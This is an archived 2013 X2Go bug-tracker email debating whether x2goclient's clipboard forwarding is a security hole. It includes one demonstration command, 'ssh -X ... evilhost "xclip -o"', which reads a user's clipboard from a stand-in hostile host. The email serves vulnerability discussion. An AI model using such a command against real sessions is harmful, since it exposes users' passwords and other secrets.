From unknown Thu Mar 28 14:59:52 2024 X-Loop: owner@bugs.x2go.org Subject: Bug#258: [X2Go-Dev] Bug#258: SECURITY: x2goclient allows clipboard sniffing Reply-To: Alexander Wuerstlein , 258@bugs.x2go.org Resent-From: Alexander Wuerstlein Resent-To: x2go-dev@lists.berlios.de Resent-CC: X2Go Developers X-Loop: owner@bugs.x2go.org Resent-Date: Mon, 01 Jul 2013 12:03:02 +0000 Resent-Message-ID: Resent-Sender: owner@bugs.x2go.org X-X2Go-PR-Message: followup 258 X-X2Go-PR-Package: x2goclient X-X2Go-PR-Keywords: security Received: via spool by 258-submit@bugs.x2go.org id=B258.137267939828332 (code B ref 258); Mon, 01 Jul 2013 12:03:02 +0000 Received: (at 258) by bugs.x2go.org; 1 Jul 2013 11:49:58 +0000 X-Spam-Checker-Version: SpamAssassin 3.3.2 (2011-06-06) on ymir.das-netzwerkteam.de X-Spam-Level: X-Spam-Status: No, score=0.0 required=5.0 tests=URIBL_BLOCKED autolearn=ham version=3.3.2 X-Greylist: delayed 361 seconds by postgrey-1.34 at ymir; Mon, 01 Jul 2013 13:49:57 CEST Received: from faui03.informatik.uni-erlangen.de (faui03.informatik.uni-erlangen.de [131.188.30.103]) by ymir (Postfix) with ESMTPS id AD2895DA79 for <258@bugs.x2go.org>; Mon, 1 Jul 2013 13:49:57 +0200 (CEST) Received: from faui0sr0.informatik.uni-erlangen.de (faui0sr0.informatik.uni-erlangen.de [131.188.30.90]) by faui03.informatik.uni-erlangen.de (Postfix) with ESMTP id 739AC6808EE; Mon, 1 Jul 2013 13:43:56 +0200 (CEST) Received: by faui0sr0.informatik.uni-erlangen.de (Postfix, from userid 31763) id 6D466B604D8; Mon, 1 Jul 2013 13:43:56 +0200 (CEST) Date: Mon, 1 Jul 2013 13:43:56 +0200 From: Alexander Wuerstlein To: Christoph Anton Mitterer , 258@bugs.x2go.org Message-ID: <20130701114356.GP2447@cip.informatik.uni-erlangen.de> References: <1372646308.18508.2.camel@heisenberg.scientia.net> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <1372646308.18508.2.camel@heisenberg.scientia.net> X-Echelon-Scan: plutonium bomb osama revenge dirty allah satan iran victory dimona cocaine guantanamo centrifuge holy war pigs mossad nsa X-Echelon-Result: Belligerent User-Agent: Mutt/1.5.21 (2010-09-15) On 13-07-01 04:56, Christoph Anton Mitterer wrote: > Package: x2goclient > Severity: grave > Tags: security > > Hi. > > From: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=714588 > > > It seems that per default (and I even found no way to disable it) > x2goclient (and perhaps other related tools?) transmit the content of > the clipboard to the remote host. Yes, other related tools like X11. x2go is basically just a faster version of the traditional xforwarding. In X11 every client can always access the clipboard/selection/etc., so you will also have the same security problems (by design). E.g. 'ssh -X user@evilhost "xclip -o"' demonstrates this. > As this may easily contain passwords or other sensitive information, > this is a extremely critical hole. I disagree, this is not a hole at all, it works as intended. Its just that users are often not educated about the implications of passing around passwords via the clipboard etc. But I concur that the ability to switch off clipboard/selection/... forwarding in the x2goagent/x2goclient would be nice to have. Patches are of course always welcome. Ciao, Alexander Wuerstlein.